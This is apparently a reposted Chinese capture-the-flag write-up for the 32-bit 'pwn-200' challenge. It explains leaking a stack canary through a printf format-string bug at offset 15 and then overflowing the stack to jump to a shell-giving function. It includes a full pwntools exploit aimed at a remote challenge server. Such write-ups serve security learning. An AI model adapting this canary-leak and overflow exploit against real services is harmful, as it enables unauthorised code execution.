Pwn-pwn-200

时间：2019-10-31 13:48:24 阅读：111 评论：0 收藏：0 [点我收藏+]

标签：exp hal col blog div load targe 存在 ctf

题目地址 ttp://www.whalectf.xin/files/47a658e388a0c505fc07b6ee48a4a2e2/binary_200

32位，开启了NX和Canary保护

技术图片

存在字符串漏洞和栈溢出，做过类似题目，地址跳转

技术图片

思路利用printf泄露出canary的值，之后再填充进去，然后栈溢出调用system函数来get shell

先看看字符串的偏移，偏移了5字节

技术图片

然后确定输入参数到canary的地址

技术图片

0x2c-0x4=0x28 0x28/4=10 10+5=15

知道泄露的偏移，就可以进行栈溢出

exp如下

from pwn import *
r=remote(‘bamboofox.cs.nctu.edu.tw‘,22002)

e=ELF(‘./binary_200‘)
flag_addr=e.symbols[‘canary_protect_me‘]
#flag_addr=0x804854d

r.sendline(‘%15$x‘)
canary=int(r.recv(), 16)

payload=‘a‘*0x28+p32(canary)+‘a‘*0xc+p32(flag_addr)
r.sendline(payload)

r.interactive()

Pwn-pwn-200

标签：exp hal col blog div load targe 存在 ctf

原文地址：https://www.cnblogs.com/gaonuoqi/p/11770554.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行